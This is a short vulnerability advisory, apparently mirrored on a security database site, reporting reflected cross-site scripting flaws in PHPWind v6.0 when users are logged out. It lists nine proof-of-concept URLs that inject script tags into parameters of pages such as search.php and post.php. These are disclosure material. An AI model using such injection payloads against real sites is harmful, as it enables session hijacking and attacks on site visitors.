Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23421
HistoryMar 21, 2010 - 12:00 a.m.

There are lost of xss vul in PHPWind v6.0 !

2010-03-2100:00:00
vulners.com
23
JSON

I found the PHPWind v6.0 just filter the xss code when the visitors login in, but
it doesnt do it when login off.

An attacker may leverage this issue to execute arbitrary script code in the browser
of an unsuspecting user in the context of the affected site.

This flaw makes its all the parameters in all the pages have the xss flaws when we
login off!

Like "hack.php" "search.php" "read.php" "post.php" "thread.php" "profile.php"
"sort.php" "message.php" "userpay.php" and so on.

For example:

http://www.example.com/hack.php?H_name=bank"><script>alert(/Liscker/);</script>
http://www.example.com/search.php?asc=desc"><script>alert(/Liscker/);</script>
http://www.example.com/read.php?nowtime="><script>alert(/Liscker/);</script>
http://www.example.com/post.php?fid=10"><script>alert(/Liscker/);</script>
http://www.example.com/profile.php?action=forumright"><script>alert(/Liscker/);</script>
http://www.example.com/thread.php?skinco=black"><script>alert(/Liscker/);</script>
http://www.example.com/message.php?action=scout"><script>alert(/Liscker/);</script>
http://www.example.com/sort.php?skinco=black"><script>alert(/Liscker/);</script>
http://www.example.com/userpay.php?skinco=black"><script>alert(/Liscker/);</script>

PHPWind v6.0 is vulnerable; other versions may also be affected PHPWind!

Liscker
2010.03.19

JSON